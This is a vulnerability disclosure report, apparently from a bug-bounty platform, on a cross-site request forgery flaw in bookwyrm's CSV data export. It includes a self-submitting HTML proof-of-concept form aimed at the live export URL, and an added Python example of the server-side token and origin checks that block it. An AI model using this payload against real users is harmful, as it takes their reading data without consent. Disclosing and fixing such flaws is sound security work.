Cross-Site Request Forgery (CSRF) in bookwyrm-social/bookwyrm

Valid

Reported on

Jul 11th 2022


Description

An attacker is able to download a user's data via the CSV Export function. The export includes all the books on the user's shelves, books they have reviewed, and books with reading activity.

Vulnerable URL

https://bookwyrm.social/preferences/export/file

Proof of Concept

<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="https://bookwyrm.social/preferences/export/file">
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

Impact

This vulnerability allows a user's reading data to be downloaded.
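The server-side check that defeats the PoC above, as an added Python example and not bookwyrm's own code: the export endpoint refuses GET, requires a token that matches the session's token, and verifies the request origin. The form field name, the attacker Referer and the request shapes are constructed assumptions for illustration.

```python
import hmac
import secrets
from urllib.parse import urlsplit

# Origin the export endpoint is served from (from the report's vulnerable URL).
SITE_ORIGIN = "https://bookwyrm.social"

def new_csrf_token() -> str:
    """Per-session secret the server keeps and embeds in its own export form."""
    return secrets.token_urlsafe(32)

def export_request_allowed(method, headers, form, session_token):
    """Decide whether a request to /preferences/export/file may run the export.

    Returns (allowed, reason). Three independent checks; any failure rejects:
      1. a data-exporting action must be a POST, never a bare GET;
      2. the submitted token must equal the session token (timing-safe compare);
      3. the Origin header (Referer as fallback) must be the site's own origin.
    """
    if method.upper() != "POST":
        return False, "export requires POST, not " + method.upper()
    submitted = form.get("csrfmiddlewaretoken", "")
    if not submitted or not hmac.compare_digest(submitted.encode(), session_token.encode()):
        return False, "csrf token missing or mismatched"
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False, "no Origin or Referer header to verify"
    parts = urlsplit(source)
    request_origin = f"{parts.scheme}://{parts.netloc}"
    if request_origin != SITE_ORIGIN:
        return False, "cross-site request from " + request_origin
    return True, "ok"

# Constructed request shaped like the report's PoC: a GET form auto-submitted from
# another origin, carrying the victim's cookies but no token (Referer is hypothetical).
POC_REQUEST = {"method": "GET", "headers": {"Referer": "https://attacker.example/"}, "form": {}}

def legitimate_request(token):
    """Constructed request as the site's own export form would send it."""
    return {"method": "POST", "headers": {"Origin": SITE_ORIGIN},
            "form": {"csrfmiddlewaretoken": token}}

if __name__ == "__main__":
    token = new_csrf_token()
    print(export_request_allowed(**POC_REQUEST, session_token=token))
    print(export_request_allowed(**legitimate_request(token), session_token=token))
```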

We are processing your report and will contact the bookwyrm-social/bookwyrm team within 24 hours. 23 days ago
Mouse Reeve validated this vulnerability 23 days ago
KhanhCM has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Mouse Reeve confirmed that a fix has been merged on f1ae64 23 days ago
The fix bounty has been dropped
export.py#L24-L52 has been validated